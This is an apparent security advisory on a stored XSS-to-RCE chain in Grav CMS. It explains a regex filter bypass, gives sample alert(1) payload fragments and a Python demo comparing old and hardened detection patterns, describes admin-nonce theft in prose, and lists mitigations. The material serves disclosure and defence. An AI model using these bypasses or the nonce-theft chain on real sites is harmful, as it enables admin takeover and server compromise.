Grav CMS, Stored XSS leading to RCE, GHSA-9695-8fr9-hw5q (Critical)

How the CVE works (technical details):

A low-privileged user with page-creation rights can exploit a stored XSS in Grav Core and the Admin Plugin (affected: v1.7.49.5 / v1.10.49.1). The `on_events` check in `system/src/Grav/Common/Security.php` is the regex

`'on_events' => '#(<[^>]+[a-z\x00-\x20\"\'\/])(on[a-z]+|xmlns)\s*=[\s|\'\"].*[\s|\'\"]>#iUu'`

which only matches an `on*` or `xmlns` attribute whose value begins with whitespace, a literal pipe or a quote (the `|` inside the character class is a literal pipe, not alternation) and whose tag then ends with a quote or whitespace before `>`. An unquoted handler such as <img src=x onload=alert(1)> fails the character class right after `=`, so the filter never fires. The `security.xss_dangerous_tags` list also omits XML-namespaced elements such as <math>, which provide further script-bearing tags.

The attacker stores such a payload in a page. When a Super Admin views a page that renders it, the script runs in the admin's browser and fetches /grav-admin/admin/config/info; the response includes the admin session context, the `admin_nonce` and the full system configuration, which the script exfiltrates with `navigator.sendBeacon` to an attacker-controlled listener. With a valid nonce the attacker can forge authenticated requests to sensitive admin endpoints, and because Grav exposes scheduled tasks and plugin management through the admin, the chain ends in remote code execution (RCE).

The fix (applied 2026-04-24) tightens the regex and adds <svg>, <math> and <option>, among others, to `security.xss_dangerous_tags` in `system/config/security.yaml`.
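The bypass described above, as an added example that is not code from the page or from the Grav project: the pre-fix `on_events` pattern transcribed to Python's `re` module, beside a hypothetical tightened pattern written for this page (it illustrates the direction of the fix, not the upstream patch), run over a handful of constructed tag fragments. The sample fragments, the `HARDENED_ON_EVENTS` pattern and the helper names are all assumptions of this demo.

```python
import re

# Added example, not Grav code: the pre-fix 'on_events' pattern from the advisory,
# transcribed to Python's re module. PCRE's i/U/u flags become re.IGNORECASE; the U
# (ungreedy) flag only changes what a match captures, not whether a match exists,
# so the boolean "does it fire?" result is the same as in PHP.
VULNERABLE_ON_EVENTS = re.compile(
    r"""(<[^>]+[a-z\x00-\x20"'/])(on[a-z]+|xmlns)\s*=[\s|'"].*[\s|'"]>""",
    re.IGNORECASE,
)

# Hypothetical hardening for this demo (NOT the upstream fix): flag any on*/xmlns
# attribute that follows an attribute separator (control char, space, quote or '/'),
# regardless of what follows the '=' sign, so quoting no longer matters.
HARDENED_ON_EVENTS = re.compile(
    r"""<[^>]*[\x00-\x20"'/](on[a-z]+|xmlns)\s*=""",
    re.IGNORECASE,
)


def detect_on_events(html: str, pattern: re.Pattern = VULNERABLE_ON_EVENTS) -> bool:
    """Return True if the pattern flags the fragment as carrying an event handler."""
    return pattern.search(html) is not None


# Constructed fragments for the demo (not the advisory's PoC).
SAMPLES = {
    "quoted":   '<img src=x onload="alert(1)">',                 # caught by both
    "unquoted": '<img src=x onload=alert(1)>',                   # the bypass class
    "slash":    '<svg/onload=alert(1)>',                         # no whitespace at all
    "xmlns":    '<svg xmlns=http://www.w3.org/2000/svg onload=alert(1)>',
    "benign":   '<a href="/docs">on topic</a>',                  # "on" outside any tag
    "nonce":    '<div nonce="r4nd0m">',                          # false positive of the old regex
}


def compare(samples: dict = SAMPLES) -> dict:
    """Map each sample name to (vulnerable_pattern_fires, hardened_pattern_fires)."""
    return {
        name: (
            detect_on_events(frag, VULNERABLE_ON_EVENTS),
            detect_on_events(frag, HARDENED_ON_EVENTS),
        )
        for name, frag in samples.items()
    }


if __name__ == "__main__":
    for name, (vuln, hard) in compare().items():
        print(f"{name:9s} vulnerable={vuln!s:5s} hardened={hard}")
```

The `nonce` row shows the other side of regex filtering: the old pattern fires on `<div nonce="...">` because the `n` of `nonce` satisfies `[a-z]` and `once` satisfies `on[a-z]+`, while it misses the real `onload=alert(1)` payload. Tightening the pattern fixes this particular bypass, but any regex filter trades misses for false positives; that is why the mitigation below prefers a tokenizing sanitizer.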

Mitigation:

  • Upgrade to a release that contains the 2026-04-24 fix.
  • Replace the regex-based XSS filter with a proper HTML sanitizer such as HTMLPurifier.
  • Limit low-privileged user permissions; disable page creation for untrusted roles.

Impact:

Full system compromise via an RCE chain. CVSS 9.0 (Critical): a low-privileged attacker, with user interaction from an admin, turns stored cross-site scripting into admin nonce theft, CSRF bypass and arbitrary code execution on the server.

    Sources:

    Reported By: github.com